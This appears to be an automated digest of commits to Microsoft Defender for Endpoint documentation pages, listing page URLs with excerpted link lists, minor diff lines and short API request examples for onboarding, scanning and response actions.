It's important to keep Microsoft Defender Antivirus (or any antivirus/antimalwar
- [Microsoft Defender Antivirus management and configuration](configuration-management-reference-microsoft-defender-antivirus.md) - [Evaluate Microsoft Defender Antivirus protection](evaluate-microsoft-defender-antivirus.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Microsoft Defender Endpoint Android https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-android.md
Guidance on how to configure Microsoft Defender for Endpoint on Android features
- [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md) - [Configure Microsoft Defender for Endpoint on Android features](android-configure.md) - [Mobile Application Management (MAM) basics](/mem/intune/apps/app-management#mobile-application-management-mam-basics)
security Microsoft Defender Endpoint Antivirus Performance Mode https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-antivirus-performance-mode.md
Performance mode can only run on a *trusted* Dev Drive and is enabled by default
## See also [Set up a Dev Drive on Windows 11](/windows/dev-drive)
security Microsoft Defender Endpoint Ios https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-ios.md
Deployment of Microsoft Defender for Endpoint on iOS can be done via Microsoft I
- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) - [Configure Conditional Access policy based on device risk score from Microsoft Defender for Endpoint](ios-configure-features.md#conditional-access-with-defender-for-endpoint-on-ios) - [Mobile Application Management (MAM) basics](/mem/intune/apps/app-management#mobile-application-management-mam-basics)
security Microsoft Defender Endpoint Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-linux.md
High I/O workloads from certain applications can experience performance issues w
- [Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint](/azure/defender-for-cloud/integration-defender-for-endpoint) - [Connect your non-Azure machines to Microsoft Defender for Cloud](/azure/defender-for-cloud/quickstart-onboard-machines) - [Turn on network protection for Linux](network-protection-linux.md)
security Microsoft Defender Endpoint Mac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac.md
Starting with macOS 11 (Big Sur), Microsoft Defender for Endpoint has been fully
- For more information about logging, uninstalling, or other topics, see [Resources for Microsoft Defender for Endpoint on Mac](mac-resources.md). - [Privacy for Microsoft Defender for Endpoint on Mac](mac-privacy.md). - [Turn on Network protection for macOS](network-protection-macos.md)
security Microsoft Defender Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint.md
Defender for Endpoint directly integrates with various Microsoft solutions, incl
Together, Microsoft 365 Defender, Defender for Endpoint, and various Microsoft security solutions form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attacks.
security Microsoft Defender Offline https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-offline.md
To see the Microsoft Defender Offline scan results:
- [Customize, initiate, and review the results of scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Microsoft Defender Security Center Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-security-center-antivirus.md
To learn more, see the following resources:
## See also - [Microsoft Defender Antivirus](microsoft-defender-antivirus-in-windows-10.md)
security Migrating Asr Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migrating-asr-rules.md
See also
- [Attack surface reduction FAQ](attack-surface-reduction-faq.yml) - [Enable attack surface reduction rules](enable-attack-surface-reduction.md) - [Evaluate attack surface reduction rules](evaluate-attack-surface-reduction.md)
security Migrating Mde Server To Cloud https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migrating-mde-server-to-cloud.md
Once you've completed the relevant migration steps, Microsoft Defender for Cloud
The extension acts as a management and deployment interface, which orchestrates and wraps the MDE installation scripts inside the operating system and reflects its provisioning state to the Azure management plane. The installation process recognizes an existing Defender for Endpoint installation and connects it to Defender for Cloud by automatically adding Defender for Endpoint service tags. If you have Windows Server 2012 R2 or 2016 machines that are provisioned with the legacy, Log Analytics-based Microsoft Defender for Endpoint solution, Microsoft Defender for Cloud's deployment process deploys the Defender for Endpoint [unified solution](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution). After successful deployment, it stops and disables the legacy Defender for Endpoint process on these machines.
security Migration Guides https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migration-guides.md
Let us know what you think! Submit your feedback at the bottom of the page. We'l
- [Microsoft Defender for Endpoint](/windows/security/threat-protection) - [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) - [Microsoft 365 Business Premium](../../business-premium/index.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)
+- [Microsoft Defender for Business](../defender-business/mdb-overview.md)
security Minimum Requirements https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/minimum-requirements.md
If you're running a third-party antimalware client and use Mobile Device Managem
- [Set up Microsoft Defender for Endpoint deployment](production-deployment.md) - [Onboard devices](onboard-configure.md)
security Monthly Security Summary Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/monthly-security-summary-report.md
Shows the number of malicious URLs that were blocked by Microsoft Defender for E
Track how many incidents and alerts were resolved in the past month using the incidents card. The card also shows all active incidents and alerts that require attention. You'll also be able to see a list of the top 10 severe incidents, their status, number of alerts, and the impacted devices and users.
security Msda Updates Previous Versions Technical Upgrade Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/msda-updates-previous-versions-technical-upgrade-support.md
Microsoft regularly releases [security intelligence updates and product updates
### Known issues -- When this update is installed, the device needs the jump package 4.18.2001.10 to be able to update to the latest platform version.
+- When this update is installed, the device needs the jump package 4.18.2001.10 to be able to update to the latest platform version.
security Mssp Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mssp-support.md
Defender for Endpoint adds partnership opportunities for this scenario and allow
security Mtd https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mtd.md
Need help in deploying or configuring Defender for Endpoint on Android & iOS? If
- [Microsoft Defender for Endpoint on iOS](microsoft-defender-endpoint-ios.md) - Stay informed about upcoming releases by reading our [announcements](https://aka.ms/mdeblog).
security Network Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-devices.md
Change command-line settings on your device to allow copying and change text siz
- [Device inventory](machines-view-overview.md) - [Windows authenticated scan](../defender-vulnerability-management/windows-authenticated-scan.md)
security Network Protection Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection-linux.md
Within 10-15 minutes, these domains will be listed in Microsoft 365 Defender und
- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
security Network Protection Macos https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection-macos.md
No End-user notification on third party browsers? Check your toast message setti
- [Web content filtering](web-content-filtering.md)
security Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection.md
Network protection now has a performance optimization that allows Block mode to
- [Configuring attack surface reduction capabilities in Microsoft Intune](/mem/intune/protect/endpoint-security-asr-policy) - [Network protection for Linux](network-protection-linux.md) | To learn about using Microsoft Network protection for Linux devices. - [Network protection for macOS](network-protection-macos.md) | To learn more about Microsoft Network protection for macOS
security Next Generation Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/next-generation-protection.md
If you're looking for antivirus-related information for other platforms, see one
> See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
security Non Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/non-windows.md
Recently announced capabilities of Microsoft Defender for Endpoint on Android an
Defender for Endpoint on Linux is available through the Defender for Endpoint Server SKU that is available for both commercial and education customers. Please contact your account team or CSP for pricing and additional eligibility requirements.
security Offboard Machine Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/offboard-machine-api.md
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
"Comment": "Offboard machine by automation" } ```
security Offboard Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/offboard-machines.md
Follow the corresponding instructions depending on your preferred deployment met
## Offboard non-Windows devices - [Offboard non-Windows devices](configure-endpoints-non-windows.md#offboard-non-windows-devices)
security Office 365 Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/office-365-microsoft-defender-antivirus.md
Protection from ransomware is one great reason to put your files in OneDrive. An
- [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)
security Onboard Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-configure.md
Onboarding devices effectively enables the endpoint detection and response capab
| [Configure Microsoft Defender Experts capabilities](../defender/defender-experts-for-hunting.md) | Microsoft Experts is a managed hunting service that provides Security Operation Centers (SOCs) with expert level monitoring and analysis to help them ensure that critical threats in their unique environments don't get missed.|Not applicable| For more information, see [Supported Microsoft Defender for Endpoint capabilities by platform](supported-capabilities-by-platform.md).
security Onboard Downlevel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-downlevel.md
You can use either of the following methods:
# Reload the configuration and apply changes $AgentCfg.ReloadConfiguration() ```
security Onboard Offline Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-offline-machines.md
Depending on the operating system, the proxy to be used for Microsoft Defender f
> [!NOTE] > Any client that has no access to the internet cannot be onboarded to Microsoft Defender Endpoint. A client must either have access to the required URLs directly, or it must have access via a proxy.
security Onboard Windows Client https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-client.md
In general, you'll identify the client you're onboarding, then follow the corres
- [Onboard Windows devices using Microsoft Intune](configure-endpoints-mdm.md) - [Onboard Windows devices using Group Policy](configure-endpoints-gp.md) - [Onboard Windows devices using a local script](configure-endpoints-script.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)
+- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)
security Onboard Windows Multi Session Device https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-multi-session-device.md
Licensing requirements for Microsoft Defender for Endpoint can be found at: [Lic
[FSLogix anti-malware exclusions](/fslogix/overview-prerequisites#configure-antivirus-file-and-folder-exclusions) [Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop infrastructure environment](/microsoft-365/security/defender-endpoint/deployment-vdi-microsoft-defender-antivirus)
security Onboard Windows Server https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-server.md
For other Windows server versions, you have two options to offboard Windows serv
- [Onboard Windows devices using Microsoft Endpoint Configuration Manager](configure-endpoints-sccm.md) - [Onboard Windows devices using Group Policy](configure-endpoints-gp.md) - [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)
security Onboarding Endpoint Configuration Manager https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-endpoint-configuration-manager.md
You have now successfully configured Controlled folder access in test mode.
## Related topic - [Onboarding using Microsoft Configuration Manager](onboarding-endpoint-manager.md)
security Onboarding Endpoint Manager https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-endpoint-manager.md
To confirm that the configuration policy has been applied to your test device, f
4. This should respond with a 1 as shown below. :::image type="content" source="images/c06fa3bbc2f70d59dfe1e106cd9a4683.png" alt-text="The command line-4" lightbox="images/c06fa3bbc2f70d59dfe1e106cd9a4683.png":::
security Onboarding Notification https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-notification.md
You can split it to two queries:
1. For offboarding, take only this interval using the OData $filter and only notify if the conditions are met.
2. Take all devices last seen in the past hour and check the first seen property for them (if the first seen property is in the past hour, the last seen must be there too).
security Onboarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding.md
The example deployments will guide you on configuring some of the Defender for E
After onboarding the endpoints move on to the next step where you'll configure the various capabilities such as endpoint detection and response, next-generation protection, and attack surface reduction. - [Step 5 - Configure capabilities](onboard-configure.md)
security Overview Attack Surface Reduction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-attack-surface-reduction.md
As mentioned in the video, Defender for Endpoint includes several attack surface
| [Network protection](network-protection.md) | Extend protection to your network traffic and connectivity on your organization's devices. (Requires Microsoft Defender Antivirus). |
| [Test attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-test.md) | Provides steps to use audit mode to test attack surface reduction rules. |
| [Web protection](web-protection-overview.md) | Web protection lets you secure your devices against web threats and helps you regulate unwanted content. |
security Overview Client Analyzer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-client-analyzer.md
For more information about our privacy statement, see [Microsoft Privacy Stateme
> [!NOTE]
> On Windows devices, if you use the Attack Surface Reduction (ASR) rule [Block process creations originating from PSExec and WMI commands](attack-surface-reduction-rules-reference.md#block-process-creations-originating-from-psexec-and-wmi-commands), then you may want to temporarily disable the rule or [configure an exclusion to the ASR rule](enable-attack-surface-reduction.md#exclude-files-and-folders-from-asr-rules) to allow the analyzer to run connectivity checks to the cloud as expected.
security Overview Endpoint Detection Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-endpoint-detection-response.md
The response capabilities give you the power to promptly remediate threats by ac
- [Incidents queue](view-incidents-queue.md) - [Alerts queue](alerts-queue.md) - [Devices list](machines-view-overview.md)
security Partner Applications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/partner-applications.md
Defender for Endpoint currently supports IOC matching and remediation for file a
## Support for non-Windows platforms Defender for Endpoint provides a centralized security operations experience for Windows and non-Windows platforms, including mobile devices. You'll be able to see alerts from various supported operating systems (OS) in the portal and better protect your organization's network.
security Partner Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/partner-integration.md
Follow the steps in [Become a Microsoft Defender for Endpoint partner](get-start
## Related topic - [Overview of management and APIs](management-apis.md)
security Post Ti Indicator https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/post-ti-indicator.md
POST https://api.securitycenter.microsoft.com/api/indicators
## Related topic - [Manage indicators](manage-indicators.md)
security Preferences Setup https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preferences-setup.md
APIs | Enable the threat intel and SIEM integration.
Rules | Configure suppression rules and automation settings.
Device management | Onboard and offboard devices.
Network assessments | Choose devices to be scanned regularly and added to the device inventory.
security Prepare Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prepare-deployment.md
The following example table serves to identify the Cyber Defense Operations Cent
## Next step After assigning roles and permissions to view and manage Defender for Endpoint it's time for [Step 3 - Identify your architecture and choose your deployment method](deployment-strategy.md).
security Prevent Changes To Security Settings With Tamper Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection.md
You can use Microsoft Intune and other methods to configure or manage tamper pro
|:|:|
| Use the [Microsoft 365 Defender portal](https://security.microsoft.com). | Turn tamper protection on (or off), tenant wide. See [Manage tamper protection for your organization using Microsoft 365 Defender](manage-tamper-protection-microsoft-365-defender.md). <br/><br/>*This method won't override settings that are managed in Microsoft Intune or Configuration Manager with tenant attach.* |
| Use the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431). | Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. See [Manage tamper protection for your organization using Intune](manage-tamper-protection-intune.md).<br/><br/>Protect Microsoft Defender Antivirus exclusions from tampering. See [Tamper protection for antivirus exclusions](manage-tamper-protection-intune.md#tamper-protection-for-antivirus-exclusions). |
-| Use [Configuration Manager with tenant attach](manage-tamper-protection-configuration-manager.md). | Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. see [Manage tamper protection for your organization using tenant attach with Configuration Manager, version 2006](manage-tamper-protection-configuration-manager.md). |
+| Use [Configuration Manager with tenant attach](manage-tamper-protection-configuration-manager.md). | Turn tamper protection on (or off), tenant wide, or apply tamper protection to some users/devices. You can exclude certain devices from tamper protection. See [Manage tamper protection for your organization using tenant attach with Configuration Manager, version 2006](manage-tamper-protection-configuration-manager.md). |
| Use the [Windows Security app](manage-tamper-protection-individual-device.md). | Turn tamper protection on (or off) on an individual device that isn't managed by a security team (such as devices for home use). See [Manage tamper protection on an individual device](manage-tamper-protection-individual-device.md).<br/><br/>*This method won't override tamper protection settings that are managed by the Microsoft 365 Defender portal, Intune, or Configuration Manager, and it isn't intended to be used by organizations.* |
> [!TIP]
To learn more about Microsoft Defender Vulnerability Management, see [Dashboard
- [Built-in protection helps guard against ransomware](built-in-protection.md) - [Frequently asked questions on tamper protection](faqs-on-tamper-protection.yml) - [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
security Prevent End User Interaction Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prevent-end-user-interaction-microsoft-defender-antivirus.md
You can prevent users from pausing scans, which can be helpful to ensure schedul
- [Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md)
- [Configure end-user interaction with Microsoft Defender Antivirus](configure-end-user-interaction-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Preview Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preview-settings.md
Turn on the preview experience setting to be among the first to try upcoming fea
- [Configure email notifications in Microsoft Defender for Endpoint](configure-email-notifications.md)
security Preview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preview.md
Turn on the preview experience setting to be among the first to try upcoming fea
> [!TIP]
> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-preview-belowfoldlink)
security Printer Protection Frequently Asked Questions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/printer-protection-frequently-asked-questions.md
Unlike an AD group, the Sid uses the Object ID for an Azure AD group. You can
PrintJobBlocked is designed for [Printer Protection V1](printer-protection.md). Because the new Printer Protection solution is built based on the V1 solution, the system will still use PrintJobBlocked. If you are using the [new Printer Protection](printer-protection-overview.md), RemovableStoragePolicyTriggered is used to track the event.
security Printer Protection Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/printer-protection-overview.md
The table below lists the properties you can use in **Parameters**:
You can view the policy name and printer information if the right options are set in your policy.

:::image type="content" source="images/enduser-experience.png" alt-text="The end-user experience.":::
security Printer Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/printer-protection.md
DeviceEvents
```

:::image type="content" source="https://user-images.githubusercontent.com/81826151/128954383-71df3009-77ef-40db-b575-79c73fda332b.png" alt-text="The Advanced Hunting page" lightbox="https://user-images.githubusercontent.com/81826151/128954383-71df3009-77ef-40db-b575-79c73fda332b.png":::
security Production Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/production-deployment.md
The following downloadable spreadsheet lists the services and their associated U
## Next step

- Continue to [Step 2 - Assign roles and permissions](prepare-deployment.md)
security Professional Services https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/professional-services.md
Mature and maintain your internal team's security capabilities to prevent, detec
- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
- [Configure managed service security provider integration](configure-mssp-support.md)
security Raw Data Export Event Hub https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/raw-data-export-event-hub.md
To get the data types for event properties, do the following:
- [Stream Microsoft Defender for Endpoint events to your Azure storage account](raw-data-export-storage.md)
- [Azure Event Hubs documentation](/azure/event-hubs/)
- [Troubleshoot connectivity issues - Azure Event Hubs](/azure/event-hubs/troubleshooting-guide)
security Raw Data Export Storage https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/raw-data-export-storage.md
To get the data types for our event properties, do the following:
- [Microsoft Defender for Endpoint Streaming API](raw-data-export.md)
- [Stream Microsoft Defender for Endpoint events to your Azure storage account](raw-data-export-storage.md)
- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security Raw Data Export https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/raw-data-export.md
Topic|Description
- [Overview of Advanced Hunting](advanced-hunting-overview.md) - [Azure Event Hubs documentation](/azure/event-hubs/)-- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
+- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security Rbac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/rbac.md
Someone with a Defender for Endpoint Global administrator role has unrestricted
- [RBAC roles](../office-365-security/migrate-to-defender-for-office-365-onboard.md#rbac-roles)
- [Create and manage device groups in Microsoft Defender for Endpoint](machine-groups.md)
security Recommendation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/recommendation.md
Want to experience Defender for Endpoint? [Sign up for a free trial.](https://si
|nonProductivityImpactedAssets|Long|Number of devices that are not affected|
|relatedComponent|String|Related software component|
security Respond File Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/respond-file-alerts.md
If you come across a problem when trying to submit a file, try each of the follo
- [Take response actions on a device](respond-machine-alerts.md)
- [Investigate files](investigate-files.md)
- [Manual response actions in Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md#manual-response-actions)
security Respond Machine Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/respond-machine-alerts.md
-
+ Title: Take response actions on a device in Microsoft Defender for Endpoint description: Take response actions on a device such as isolating devices, collecting an investigation package, managing tags, running an av scan, and restricting app execution. keywords: respond, isolate, isolate device, collect investigation package, action center, restrict, manage tags, av scan, restrict app
All other related details are also shown, for example, submission date/time, sub
- [Take response actions on a file](respond-file-alerts.md)
- [Manual response actions in Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md#manual-response-actions)
- [Report inaccuracy](/microsoft-365/security/defender-endpoint/tvm-security-recommendation#report-inaccuracy)
security Restore Quarantined Files Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/restore-quarantined-files-microsoft-defender-antivirus.md
If Microsoft Defender Antivirus is configured to detect and remediate threats on
- [Review scan results](review-scan-results-microsoft-defender-antivirus.md) - [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md) - [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)-- [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md)
+- [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md)
security Restrict Code Execution https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/restrict-code-execution.md
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
```

- To remove code execution restriction from a device, see [Remove app restriction](unrestrict-code-execution.md).
security Review Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/review-alerts.md
Selecting a device or a user card in the affected assets sections will switch to
- [View and organize the incidents queue](view-incidents-queue.md)
- [Investigate incidents](investigate-incidents.md)
- [Manage incidents](manage-incidents.md)
security Review Scan Results Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/review-scan-results-microsoft-defender-antivirus.md
Use the [**Get** method of the **MSFT_MpThreat** and **MSFT_MpThreatDetection**]
- [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Run Advanced Query Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-advanced-query-api.md
Here is an example of the response.
- [Microsoft Defender for Endpoint APIs introduction](apis-intro.md)
- [Advanced Hunting from Portal](advanced-hunting-query-language.md)
- [Advanced Hunting using PowerShell](run-advanced-query-sample-powershell.md)
security Run Advanced Query Sample Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-advanced-query-sample-powershell.md
$results | ConvertTo-Json | Set-Content file1.json
- [Microsoft Defender for Endpoint APIs](apis-intro.md)
- [Advanced Hunting API](run-advanced-query-api.md)
- [Advanced Hunting using Python](run-advanced-query-sample-python.md)
security Run Advanced Query Sample Python https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-advanced-query-sample-python.md
outputFile.close()
- [Microsoft Defender for Endpoint APIs](apis-intro.md)
- [Advanced Hunting API](run-advanced-query-api.md)
- [Advanced Hunting using PowerShell](run-advanced-query-sample-powershell.md)
security Run Analyzer Macos Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-analyzer-macos-linux.md
Usage example `sudo ./mde_support_tool.sh skipfaultyrules -e true`
- perf_benchmark.tar.gz Description: The performance test reports. You will see this only if you are using the performance parameter.
security Run Analyzer Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-analyzer-windows.md
By default, the unpacked MDEClientAnalyzerResult.zip file will contain the follo
- [Download and run the client analyzer](download-client-analyzer.md)
- [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)
- [Understand the analyzer HTML report](analyzer-report.md)
security Run Av Scan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-av-scan.md
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
  "ScanType": "Full"
}
```
security Run Detection Test https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-detection-test.md
The Command Prompt window closes automatically. If successful, a new alert appea
- [Onboard Windows devices](configure-endpoints.md)
- [Onboard servers](configure-server-endpoints.md)
- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](/microsoft-365/security/defender-endpoint/troubleshoot-onboarding)
security Run Live Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-live-response.md
Content-type: application/json
- [Get machine action API](get-machineaction-object.md)
- [Get live response result](get-live-response-result.md)
- [Cancel machine action](cancel-machine-action.md)
security Run Scan Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-scan-microsoft-defender-antivirus.md
For more information about which parameters are allowed, see [Windows Defender W
> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Schedule Antivirus Scan In Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scan-in-mde.md
Use the following steps to schedule scans:
Tue Jun 14 20:20:50 UTC 2022 Time Scan Finished
[root@redhat7 cron.weekly] #
```
security Schedule Antivirus Scans Group Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-group-policy.md
For more information, see the [Manage when protection updates should be download
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
> - [Configure Defender for Endpoint on Android features](android-configure.md)
